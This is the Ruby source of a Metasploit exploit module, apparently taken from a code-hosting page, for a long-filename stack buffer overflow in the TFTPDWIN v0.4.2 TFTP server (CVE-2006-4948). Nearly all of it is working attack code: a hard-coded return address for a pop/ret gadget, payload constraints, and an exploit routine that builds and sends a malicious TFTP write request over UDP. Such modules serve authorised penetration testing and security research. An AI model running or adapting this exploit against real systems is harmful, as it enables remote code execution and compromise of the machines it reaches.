Path: blob/master/modules/exploits/windows/tftp/tftpdwin_long_filename.rb
19850 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Udp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'TFTPDWIN v0.4.2 Long Filename Buffer Overflow',15'Description' => %q{16This module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. By sending17an overly long file name to the tftpd.exe server, the stack can be overwritten.18},19'Author' => [ 'aushack' ],20'References' => [21[ 'CVE', '2006-4948' ],22[ 'OSVDB', '29032' ],23[ 'BID', '20131' ],24[ 'EDB', '3132' ],25],26'DefaultOptions' => {27'EXITFUNC' => 'process',28},29'Payload' => {30'Space' => 284,31'BadChars' => "\x00",32'StackAdjustment' => -3500,33},34'Platform' => 'win',35'Targets' => [36# Patrick - Tested OK 2007/10/02 w2ksp0, w2ksp4, xpsp0, xpsp2 en37[ 'Universal - tftpd.exe', { 'Ret' => 0x00458b91 } ] # pop edx / ret tftpd.exe38],39'Privileged' => false,40'DisclosureDate' => '2006-09-21',41'DefaultTarget' => 0,42'Notes' => {43'Reliability' => UNKNOWN_RELIABILITY,44'Stability' => UNKNOWN_STABILITY,45'SideEffects' => UNKNOWN_SIDE_EFFECTS46}47)48)4950register_options(51[52Opt::RPORT(69),53], self54)55end5657def exploit58connect_udp5960print_status("Trying target #{target.name}...")61sploit = "\x00\x02" + payload.encoded + [target['Ret']].pack('V')62sploit << "netascii\x00" # The first null byte is borrowed for the target return address :)63udp_sock.put(sploit)6465disconnect_udp66end67end686970